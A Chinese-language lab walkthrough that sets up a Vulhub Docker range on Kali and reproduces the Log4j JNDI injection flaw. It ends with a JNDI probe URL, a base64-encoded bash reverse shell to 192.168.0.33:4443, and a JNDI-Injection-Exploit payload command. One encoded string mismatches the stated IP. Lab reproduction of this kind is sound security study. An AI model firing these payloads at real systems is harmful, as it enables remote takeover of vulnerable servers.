1.环境搭建
一台kali(靶机)
一台win(攻击机)
这里kali进行换源
# 官方源
# deb http://http.kali.org/kali kali-rolling main non-free contrib
# deb-src http://http.kali.org/kali kali-rolling main non-free contrib
#根据需要自己选一个,中科大的还可以
#中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
#阿里云
#deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
#deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
#清华大学
#deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
#deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
#浙大
#deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
#deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
#东软大学
#deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib
#deb-src http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib
#重庆大学
#deb http://http.kali.org/kali kali-rolling main non-free contrib
#deb-src http://http.kali.org/kali kali-rolling main non-free contrib
进入/etc/apt目录
编辑sources.list文件命令如下
sudo vim sources.list
将原有的源注释,添加其他源,这里用的是阿里的
随后进行更新
apt-get update 更新索引
apt-get upgrade 更新软件
apt-get dist-upgrade 升级
apt-get clean 删除缓存包
apt-get autoclean 删除未安装的deb包
普通用户记得在命令前接上sudo
kali机安装docker命令如下
sudo apt install docker.io
root用户不用加sudo
安装docker-compose
sudo apt-get install docker-compose
安装靶场vulhub
git clone https://github.com/vulhub/vulhub.git
启动靶场环境
进入靶场
cd /vulhub/log4j/你所想打的对应版本
启动
docker-compose up -d
查看容器开放端口
docker ps
访问靶场,ip加端口访问
漏洞复现
将以下代码放入url
admin/cores?action=${jndi:ldap://uhd50l.dnslog.cn}
下载工具
JNDI-Injection-Exploit
Release JNDI-Injection-Exploit v1.0 · welk1n/JNDI-Injection-Exploit · GitHub
构建反弹shell要经过base64编码
原码
bash -i >& /dev/tcp/192.168.0.33/4443 0>&1
编码后
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMzkvNDQ0MyAwPiYx
利用JNDI-Injection-Exploit v1.0生成payload
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMzMvNDQ0MyAwPiYx}|{base64,-d}|{bash,-
i}" -A 192.168.0.33
发包